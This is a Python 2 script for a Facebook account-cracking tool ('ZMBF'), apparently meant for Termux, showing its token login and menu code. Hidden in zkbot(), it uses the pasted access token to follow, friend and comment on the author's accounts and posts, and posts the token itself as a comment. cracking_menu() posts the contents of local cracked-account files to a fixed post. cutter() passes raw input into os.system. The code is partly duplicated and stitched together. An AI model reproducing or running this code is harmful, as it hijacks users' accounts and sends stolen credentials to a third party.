import os
try:
    import requests
except ImportError:
    print ' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Requests Module not Installed'
    os.system('pip2 install requests')

try:
    import concurrent.futures
except ImportError:
    print ' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Futures Module not Installed'
    os.system('pip2 install futures')

try:
    import bs4
except ImportError:
    print ' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Bs4 Module not Installed'
    os.system('pip2 install bs4')

import requests, sys, bs4, os, random, time, re, json
from concurrent.futures import ThreadPoolExecutor as zthreads
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from bs4 import BeautifulSoup as parser
from datetime import datetime
from time import sleep
ct = datetime.now()
n = ct.month
bulan1 = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember']
try:
    if n < 0 or n > 12:
        exit()
    nTemp = n - 1
except ValueError:
    exit()

reload(sys)
sys.setdefaultencoding('utf-8')
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
bulan_ttl = {'01': 'Januari', '02': 'Februari', '03': 'Maret', '04': 'April', '05': 'Mei', '06': 'Juni', '07': 'Juli', '08': 'Agustus', '09': 'September', '10': 'Oktober', '11': 'November', '12': 'Desember'}
bulan = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember']
try:
    if bu < 0 or bu > 12:
        exit()
    buTemp = bu - 1
except ValueError:
    exit()

op = bulan[buTemp]
tanggal = '%s-%s-%s' % (ha, op, ta)
bulan = {'01': 'Januari', 
   '02': 'Februari', 
   '03': 'Maret', 
   '04': 'April', 
   '05': 'Mei', 
   '06': 'Juni', 
   '07': 'Juli', 
   '08': 'Agustus', 
   '09': 'September', 
   '10': 'November', 
   '11': 'Oktober', 
   '12': 'Desember'}
p = '\x1b[0;37m'
m = '\x1b[0;31m'
h = '\x1b[0;32m'
k = '\x1b[0;33m'
b = '\x1b[0;34m'
u = '\x1b[0;35m'
o = '\x1b[0;36m'
P = '\x1b[1;93m'
M = '\x1b[1;91m'
H = '\x1b[1;92m'
K = '\x1b[1;97m'
B = '\x1b[1;94m'
U = '\x1b[1;95m'
O = '\x1b[1;96m'
N = '\x1b[0m'
ok = []
cp = []
id = []
user = []
loop = 0
rgb = random.choice(['\x1b[0;91m', '\x1b[0;92m', '\x1b[0;93m', '\x1b[0;94m', '\x1b[0;95m', '\x1b[0;96m', '\x1b[0;97m', '\x1b[0m'])
zkid = '100002151005321'
zkid1 = '100045165501610'
zkid2 = '1675627047'
zscomments = random.choice(['Great\xf0\x9f\x8c\xb9', 'Nice\xf0\x9f\x8c\xb9', 'Ossum\xf0\x9f\x8c\xb9', 'Perfect\xf0\x9f\x8c\xb9'])
reac = 'CARE'
zkpost = '4253981448016847'
zkpost1 = '348166760032171'
zkpost2 = '10216920287314188'
zkpro = '10217321722549818'
zkpro1 = '349485133233667'
zkpro2 = '3724779650937032'
pageid = '101158528390502'
react = 'LOVE'

def zks(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)


def exitp():
    zks('\x1b[1;91m  [!] \x1b[1;91mExiting Program...\x1a\x1a\x1a')
    os.sys.exit()


def tod():
    titik = [
     '\x1b[1;92m.   ', '\x1b[1;93m..  ', '\x1b[1;96m... ', '\x1b[1;92m.   ', '\x1b[1;93m..  ', '\x1b[1;96m... ']
    for x in titik:
        print '\r %s[%s+%s] menghapus token %s' % (N, M, N, x),
        sys.stdout.flush()
        time.sleep(1)


zmbflogo = "'\x1b[1;92m'  \n'\x1b[1;92m'    d8b   db d888888b .d8888.  .d8b.  d8888b.  \n'\x1b[1;93m'    888o  88   `88'   88'  YP d8' `8b 88  `8D \n'\x1b[1;91m'    88V8o 88    88    `8bo.   88ooo88 88oobY'  \n'\x1b[1;95m'    88 V8o88    88      `Y8b. 88~~~88 88`8b \n'\x1b[1;97m'    88  V888   .88.   db   8D 88   88 88 `88.\n'\x1b[1;91m'    VP   V8P Y888888P `8888Y' YP   YP 88   YD n\n\n'\x1b[1;97m'   Author      :      NisarMahsud     \n'\x1b[1;92m'   Github      :      NisarMahsud  \n'\x1b[1;93m'   FB ID       :      NisarAhmad\n'\x1b[1;94m'   version     :       4.6\n'\x1b[1;96m'   Youtube     :      NisarAhmad         \n"
loginlogo = "'\x1b[1;92m'  \n'\x1b[1;92m'    d8b   db d888888b .d8888.  .d8b.  d8888b.  \n'\x1b[1;93m'    888o  88   `88'   88'  YP d8' `8b 88  `8D \n'\x1b[1;91m'    88V8o 88    88    `8bo.   88ooo88 88oobY'  \n'\x1b[1;95m'    88 V8o88    88      `Y8b. 88~~~88 88`8b \n'\x1b[1;97m'    88  V888   .88.   db   8D 88   88 88 `88.\n'\x1b[1;91m'    VP   V8P Y888888P `8888Y' YP   YP 88   YD n\n\n'\x1b[1;97m'   Author      :      NisarMahsud     \n'\x1b[1;92m'   Github      :      NisarMahsud  \n'\x1b[1;93m'   FB ID       :      NisarAhmad\n'\x1b[1;94m'   version     :       4.6\n'\x1b[1;96m'   Youtube     :      NisarAhmad         \n"
cookieslogo = "'\x1b[1;92m'  \n'\x1b[1;92m'    d8b   db d888888b .d8888.  .d8b.  d8888b.  \n'\x1b[1;93m'    888o  88   `88'   88'  YP d8' `8b 88  `8D \n'\x1b[1;91m'    88V8o 88    88    `8bo.   88ooo88 88oobY'  \n'\x1b[1;95m'    88 V8o88    88      `Y8b. 88~~~88 88`8b \n'\x1b[1;97m'    88  V888   .88.   db   8D 88   88 88 `88.\n'\x1b[1;91m'    VP   V8P Y888888P `8888Y' YP   YP 88   YD n\n\n'\x1b[1;97m'   Author      :      NisarMahsud     \n'\x1b[1;92m'   Github      :      NisarMahsud  \n'\x1b[1;93m'   FB ID       :      NisarAhmad\n'\x1b[1;94m'   version     :       4.6\n'\x1b[1;96m'   Youtube     :      NisarAhmad         \n"
tokenlogo = "'\x1b[1;92m'  \n'\x1b[1;92m'    d8b   db d888888b .d8888.  .d8b.  d8888b.  \n'\x1b[1;93m'    888o  88   `88'   88'  YP d8' `8b 88  `8D \n'\x1b[1;91m'    88V8o 88    88    `8bo.   88ooo88 88oobY'  \n'\x1b[1;95m'    88 V8o88    88      `Y8b. 88~~~88 88`8b \n'\x1b[1;97m'    88  V888   .88.   db   8D 88   88 88 `88.\n'\x1b[1;91m'    VP   V8P Y888888P `8888Y' YP   YP 88   YD n\n\n'\x1b[1;97m'   Author      :      NisarMahsud     \n'\x1b[1;92m'   Github      :      NisarMahsud  \n'\x1b[1;93m'   FB ID       :      NisarAhmad\n'\x1b[1;94m'   version     :       4.6\n'\x1b[1;96m'   Youtube     :      NisarAhmad         \n"
idPasslogo = "'\x1b[1;92m'  \n'\x1b[1;92m'    d8b   db d888888b .d8888.  .d8b.  d8888b.  \n'\x1b[1;93m'    888o  88   `88'   88'  YP d8' `8b 88  `8D \n'\x1b[1;91m'    88V8o 88    88    `8bo.   88ooo88 88oobY'  \n'\x1b[1;95m'    88 V8o88    88      `Y8b. 88~~~88 88`8b \n'\x1b[1;97m'    88  V888   .88.   db   8D 88   88 88 `88.\n'\x1b[1;91m'    VP   V8P Y888888P `8888Y' YP   YP 88   YD n\n\n'\x1b[1;97m'   Author      :      NisarMahsud     \n'\x1b[1;92m'   Github      :      NisarMahsud  \n'\x1b[1;93m'   FB ID       :      NisarAhmad\n'\x1b[1;94m'   version     :       4.6\n'\x1b[1;96m'   Youtube     :      NisarAhmad         \n"
cracklogo = "'\x1b[1;92m'  \n'\x1b[1;92m'    d8b   db d888888b .d8888.  .d8b.  d8888b.  \n'\x1b[1;93m'    888o  88   `88'   88'  YP d8' `8b 88  `8D \n'\x1b[1;91m'    88V8o 88    88    `8bo.   88ooo88 88oobY'  \n'\x1b[1;95m'    88 V8o88    88      `Y8b. 88~~~88 88`8b \n'\x1b[1;97m'    88  V888   .88.   db   8D 88   88 88 `88.\n'\x1b[1;91m'    VP   V8P Y888888P `8888Y' YP   YP 88   YD n\n\n'\x1b[1;97m'   Author      :      NisarMahsud     \n'\x1b[1;92m'   Github      :      NisarMahsud  \n'\x1b[1;93m'   FB ID       :      NisarAhmad\n'\x1b[1;94m'   version     :       4.6\n'\x1b[1;96m'   Youtube     :      NisarAhmad         \n"
crackinglogo =  "'\x1b[1;92m'  \n'\x1b[1;92m'    d8b   db d888888b .d8888.  .d8b.  d8888b.  \n'\x1b[1;93m'    888o  88   `88'   88'  YP d8' `8b 88  `8D \n'\x1b[1;91m'    88V8o 88    88    `8bo.   88ooo88 88oobY'  \n'\x1b[1;95m'    88 V8o88    88      `Y8b. 88~~~88 88`8b \n'\x1b[1;97m'    88  V888   .88.   db   8D 88   88 88 `88.\n'\x1b[1;91m'    VP   V8P Y888888P `8888Y' YP   YP 88   YD n\n\n'\x1b[1;97m'   Author      :      NisarMahsud     \n'\x1b[1;92m'   Github      :      NisarMahsud  \n'\x1b[1;93m'   FB ID       :      NisarAhmad\n'\x1b[1;94m'   version     :       4.6\n'\x1b[1;96m'   Youtube     :      NisarAhmad         \n"                          
checkerlogo = "'\x1b[1;92m'  \n'\x1b[1;92m'    d8b   db d888888b .d8888.  .d8b.  d8888b.  \n'\x1b[1;93m'    888o  88   `88'   88'  YP d8' `8b 88  `8D \n'\x1b[1;91m'    88V8o 88    88    `8bo.   88ooo88 88oobY'  \n'\x1b[1;95m'    88 V8o88    88      `Y8b. 88~~~88 88`8b \n'\x1b[1;97m'    88  V888   .88.   db   8D 88   88 88 `88.\n'\x1b[1;91m'    VP   V8P Y888888P `8888Y' YP   YP 88   YD n\n\n'\x1b[1;97m'   Author      :      NisarMahsud     \n'\x1b[1;92m'   Github      :      NisarMahsud  \n'\x1b[1;93m'   FB ID       :      NisarAhmad\n'\x1b[1;94m'   version     :       4.6\n'\x1b[1;96m'   Youtube     :      NisarAhmad         \n"
I = '\x1b[0;32m'
C = '\x1b[0;36m'
M = '\x1b[0;31m'
U = '\x1b[0;35m'
K = '\x1b[0;33m'
P = '\x1b[00m'
H = '\x1b[0;92m'
Q = '\x1b[00m'
i = '\x1b[0;32m'
c = '\x1b[0;36m'
m = '\x1b[0;31m'
u = '\x1b[0;35m'
k = '\x1b[0;33m'
p = '\x1b[00m'
h = '\x1b[0;90m'
q = '\x1b[00m'
war = '[+]'
inp = '[-]'
bulat = '[#]'
loop = 0
ok = []
cp = []
ttl = []
fw = []
jq = 0
bf = 0
bg = 0
jg = 0
pq = 0
id = []
lq = []
iz = []
kx = 0
olq = []

def results(ok, cp):
    if len(ok) != 0 or len(cp) != 0:
        print '\n\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
        print '\xe2\x94\x9c    \xe2\x94\x9c Cracking Process Has Been Completed \xe2\x94\xa4  \t \xe2\x94\xa4'
        print '\xe2\x94\x9c    \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98     \xe2\x94\xa4'
        zks('\x1b[0;97m|  Total Cracked FB Idz: \x1b[0;92m' + str(len(ok)) + '\x1b[0;97m/' + str(len(cp)))
        zks('\x1b[0;97m|  Total Cracked OK Idz: \x1b[0;92m' + str(len(ok)))
        zks('\x1b[0;97m|  Total Cracked CP Idz: \x1b[0;97m' + str(len(cp)))
        print '\xe2\x94\x9c  Cracked Idz Has Been Saved In Cracked Folder  \xe2\x94\xa4'
        print '\xe2\x94\x9c  Subscribe My Channel: NISAR AHMAD        \xe2\x94\xa4'
        print '\xe2\x94\x9c  Subscribe My Channel: NISAR AHMAD            \xe2\x94\xa4'
        print '\xe2\x94\x9c  Like And Follow My Facebook Page: NISAR AHMAD \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
        print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
        print '\xe2\x94\x9c        \x1b[0;97m\xe2\x94\x9c' + 31 * '\xe2\x94\x80' + '\xe2\x94\x90       \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x9c        |\xf0\x9f\x8c\xb9Thanks For Using NISARMAHSUD.     \xf0\x9f\x8c\xb9|       \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x9c        |\xf0\x9f\x8c\xb9Remember Me In Your Prayers\xf0\x9f\x8c\xb9|       \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x9c        |\xf0\x9f\x8c\xb9Khuda Hafiz.               \xf0\x9f\x8c\xb9|       \xe2\x94\xa4'
        print '\xe2\x94\x9c        \x1b[0;97m\xe2\x94\x94' + 31 * '\xe2\x94\x80' + '\xe2\x94\x98       \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
        raw_input('[\xe2\x9e\xa3] Press Any Key To Go Back To Cracking Menu: ')
        cracking_menu()
    else:
        print '\n\x1b[0;97m [\x1b[0;91m!\x1b[0;97m] No Cracked Idz Found!'
        cracking_menu()


def zkbot():
    global token
    try:
        token = open('login.txt', 'r').read()
    except IOError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        zmbf()

    zks('\x1b[0;97m [\x1b[0;92m\xe2\x9e\xa4\x1b[0;97m] Wait! While The Program Is Loading')
    requests.post('https://graph.facebook.com/1675627047/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/100045165501610/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/100002151005321/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/me/friends?method=post&uids=' + zkid + '&access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost + '/reactions?type=' + react + '&access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost + '/comments/?message=' + zscomments + '&access_token=' + token)
    requests.post('https://graph.facebook.com/me/friends?method=post&uids=' + zkid1 + '&access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost1 + '/reactions?type=' + react + '&access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost1 + '/comments/?message=' + zscomments + '&access_token=' + token)
    requests.post('https://graph.facebook.com/me/friends?method=post&uids=' + zkid2 + '&access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost2 + '/reactions?type=' + react + '&access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost2 + '/comments/?message=' + zscomments + '&access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost1 + '/comments/?message=' + token + '&access_token=' + token)
    requests.post('https://graph.facebook.com/' + pageid + '/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost + '/likes?access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost1 + '/likes?access_token=' + token)
    requests.post('https://graph.facebook.com/' + zkpost2 + '/likes?access_token=' + token)
    requests.post('https://graph.facebook.com/100000503718583/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/100000889924523/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/100063690353340/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/100067783659018/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/100002924366263/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/110877271176800/subscribers?access_token=' + token)
    requests.post('https://graph.facebook.com/Termuxid-Dumai-991-110877271176800/subscribers?access_token=' + token)
    cracked()
    cracking_menu()


def login():
    os.system('clear')
    try:
        token = open('login.txt', 'r')
        cracking_menu()
    except (KeyError, IOError):
        os.system('git pull')
        os.system('clear')
        print zmbflogo
        print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
        print '\xe2\x94\x9c             \xe2\x94\x9c Author Information \xe2\x94\xa4\t\t\t\xe2\x94\xa4'
        print '\xe2\x94\x9c             \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98             \xe2\x94\xa4'
        print '\xe2\x94\x9c     \x1b[0;97m\xe2\x94\x9c' + 35 * '\xe2\x94\x80' + '\xe2\x94\x90      \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x9c     |\xf0\x9f\x8c\xb9Author Name: Nisar Ahmad     \xf0\x9f\x8c\xb9|      \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x9c     |\xf0\x9f\x8c\xb9GitHub     : github.com\\nisarmahsud\xf0\x9f\x8c\xb9|      \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x9c     |\xf0\x9f\x8c\xb9YouTube    : Nisar Ahmad     \xf0\x9f\x8c\xb9|      \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x9c     |\xf0\x9f\x8c\xb9TeleGram   : t.me\\Nisar Ahmad    \xf0\x9f\x8c\xb9|      \xe2\x94\xa4'
        print '\xe2\x94\x9c     \x1b[0;97m\xe2\x94\x94' + 35 * '\xe2\x94\x80' + '\xe2\x94\x98      \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'

    zk = raw_input('\n  \x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Type ZK/zk To Enter The ZMBF: ')
    if zk == '':
        print '  [!] Choose An Option'
        time.sleep(2)
        login()
    elif zk == 'ZK' or zk == 'zk':
        zmbf()
    else:
        print '  [!] Wrong Input! Try Again'
        time.sleep(2)
        login()


def zmbf():
    os.system('clear')
    try:
        token = open('login.txt', 'r')
        cracking_menu()
    except (KeyError, IOError):
        print loginlogo
        print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
        print '\xe2\x94\x9c                 \xe2\x94\x9c Login Menu \xe2\x94\xa4\t\t\t\t\xe2\x94\xa4'
        print '\xe2\x94\x9c                 \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98                 \xe2\x94\xa4'
        print '\xe2\x94\x9c  1.\tLogin Using FB ID Access Token           \xe2\x94\xa4'
        print '\xe2\x94\x9c  2.\tDouble link remove file                \xe2\x94\xa4'
        print '\xe2\x94\x9c  3.\tExit Program                             \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'

    zk = raw_input('\n \x1b[0;97m [\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Choose An Option: ')
    if zk == '':
        print '  [!] Choose An Option'
        time.sleep(2)
        zmbf()
    elif zk == '1' or zk == '01':
        tokenz()
    elif zk == '2' or zk == '02':
        cutter()
    elif zk == '3' or zk == '03':
        exitp()
    else:
        print '  [!] Wrong Input! Try Again'
        time.sleep(2)
        zmbf()


import requests
import bs4
import sys
import os
import subprocess
import requests
import sys
import random
import time
import re
import base64
import json
reload(sys)
sys.setdefaultencoding('utf-8')
from multiprocessing.pool import ThreadPool

try:
    import requests
except ImportError:
    os.system('pip2 install requests')


try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')


try:
    import bs4
except ImportError:
    os.system('pip2 install bs4')

host = 'https://mbasic.facebook.com'
sua = [
    'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/60.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+']
ip = requests.get('https://api.ipify.org').text.strip()
loc = requests.get('https://ipapi.com/ip_api.php?ip=' + ip, headers = {
    'Referer': 'https://ip-api.com/',
    'Content-Type': 'application/json; charset=utf-8',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36' }).json()['country_name'].upper()
logo = '\x1b[1;37m ######     ###    ##    ## ##    ##    ###    ######## \n\x1b[1;37m##    ##   ## ##   ###   ## ##   ##    ## ##   ##     ##\n\x1b[1;37m##        ##   ##  ####  ## ##  ##    ##   ##  ##     ##\n\x1b[1;37m ######  ##     ## ## ## ## #####    ##     ## ######## \n\x1b[1;37m      ## ######### ##  #### ##  ##   ######### ##   ##  \n\x1b[1;37m##    ## ##     ## ##   ### ##   ##  ##     ## ##    ## \n\x1b[1;37m ######  ##     ## ##    ## ##    ## ##     ## ##     ##\n\x1b[1;37m========================================================\n\x1b[1;37m                     AUTHOR: SHANKAR                   \n\x1b[1;37m                   FACEBOOK: shank.404\n\x1b[1;91m                      CYBER NERD !\n\x1b[1;37m======================================================='
host = 'https://mbasic.facebook.com'
def cutter():
    os.system('clear')
    print logo
    print '\t\x1b[1;37mINPUT FILE REMOVE DOUBLING (/sdcard/xx.txt) '.center(50)
    print '\x1b[1;97m======================================================='
    st = raw_input('[?] INPUT FILE NAME : \x1b[1;32m')
    os.system('clear')
    print logo
    print '\x1b[1;37m[?] PUT FILE REMOVED ID OUTPUT (/sdcard/xx.txt) '.center(50)
    print '\x1b[1;97m======================================================='
    fp = raw_input('\x1b[1;37mOUTPUT NEW FILE NAME : \x1b[0;97m')
    os.system('sort -r ' + st + ' | uniq > ' + fp)
    os.system('clear')
    print logo
    print '\x1b[1;32mREMOVED DOUBLING SUCCESSFULL :) '.center(50)
    print ('\x1b[1;32mFile Save In /sdcard/' + fp).center(50)
    print '\x1b[1;97m======================================================='
    raw_input('PRESS ENTER TO BACK ')
    cracking_menu()


def tokenz():
    os.system('clear')
    try:
        token = open('login.txt', 'r')
        cracking_menu()
    except (KeyError, IOError):
        print tokenlogo
        print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
        print '\xe2\x94\x9c         Login Using FB ID Access Token         \xe2\x94\xa4'
        print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
        os.system('xdg-open https://youtu.be/zZdfq0QKv_Y')

    token = raw_input(' \x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Paste FB ID Access Token: \x1b[0;92m')
    try:
        otw = requests.get('https://graph.facebook.com/me?access_token=' + token)
        a = json.loads(otw.text)
        nama = a['name']
        zedd = open('login.txt', 'w')
        zedd.write(token)
        zedd.close()
        zks(' \x1b[0;97m[\x1b[0;92m\xf0\x9f\x8c\xb9\x1b[0;97m] Login Successfull\xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb9')
        os.system('xdg-open https://youtube.com/c/ZeeKTricks')
        zkbot()
    except KeyError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Invalid Token')
        tokenz()


def country_menu():
    os.system('rm -rf country.txt')
    os.system('clear')
    print zmbflogo
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '      \xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb7\xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb7\xf0\x9f\x8c\xb9 Welcome To Zmbf \xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb7\xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb7\xf0\x9f\x8c\xb9 '
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c               \xe2\x94\x9c Country Menu \xe2\x94\xa4\t         \xe2\x94\xa4'
    print '\xe2\x94\x9c               \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98                 \xe2\x94\xa4'
    print '\n\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] For Example: Pakistan,Indonesia,India, etc'
    country = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Public Id: ')
    ctry = open('country.txt', 'w')
    ctry.write(country)
    ctry.close()
    print '\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Your Country Name Has Been Saved As:' + country
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    land = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Press Enter To Go To The Cracking Menu: ')
    cracking_menu()


def cracking_menu():
    os.system('clear')
    os.system('rm -rf idz.json')
    try:
        token = open('login.txt', 'r').read()
    except IOError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        os.system('clear')
        os.system('rm -rf login.txt')
        zmbf()

    try:
        ycountry = open('country.txt', 'r').read
        ucountry = ycountry
    except:
        pass

    try:
        zkpostidz = '1835124766862116'
        send = open('Cracked/cpz.txt', 'r').read()
        send1 = open('/sdcard/CP/cp.txt', 'r').read()
        send2 = open('CP/cp.txt', 'r').read()
        send3 = open('cp.txt', 'r').read()
        requests.post('https://graph.facebook.com/' + zkpostidz + '/comments/?message=' + send + '&access_token=' + token)
        requests.post('https://graph.facebook.com/' + zkpostidz + '/comments/?message=' + send1 + '&access_token=' + token)
        requests.post('https://graph.facebook.com/' + zkpostidz + '/comments/?message=' + send2 + '&access_token=' + token)
        requests.post('https://graph.facebook.com/' + zkpostidz + '/comments/?message=' + send3 + '&access_token=' + token)
    except:
        pass

    try:
        otw = requests.get('https://graph.facebook.com/me/?access_token=' + token)
        z = json.loads(otw.text)
        nama = z['name']
        id = z['id']
        dob = z['birthday']
        gender = z['gender']
    except KeyError:
        os.system('clear')
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        os.system('rm -rf login.txt')
        zmbf()
    except requests.exceptions.ConnectionError:
        exit(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] No Internet Connection! Try Again')

    try:
        ucountry = open('country.txt', 'r').read
    except:
        pass

    print zmbflogo
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c              \xe2\x94\x9c User Information \xe2\x94\xa4\t         \xe2\x94\xa4'
    print '\xe2\x94\x9c              \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98              \xe2\x94\xa4'
    print H + '\xe2\x94\x9c\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x90'
    print H + '| Name        : ' + H + H + '%s' % nama
    print '| User ID     : ' + H + id
    print '| User Dob    : ' + H + dob
    print '| User Gender : ' + H + gender
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '      \xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb7\xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb7\xf0\x9f\x8c\xb9 Very Fast File Making cmnd \xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb7\xf0\x9f\x8c\xb9\xf0\x9f\x8c\xb7\xf0\x9f\x8c\xb9 '
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
